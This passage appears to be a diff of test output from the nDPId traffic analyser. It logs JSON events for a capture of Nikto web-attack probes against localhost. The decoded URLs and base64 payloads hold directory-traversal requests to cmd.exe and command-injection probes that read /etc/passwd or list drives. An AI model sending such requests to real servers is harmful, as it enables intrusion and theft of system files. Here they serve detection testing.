00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} 
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} 
+01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} 
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} 
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} 
+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} 
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 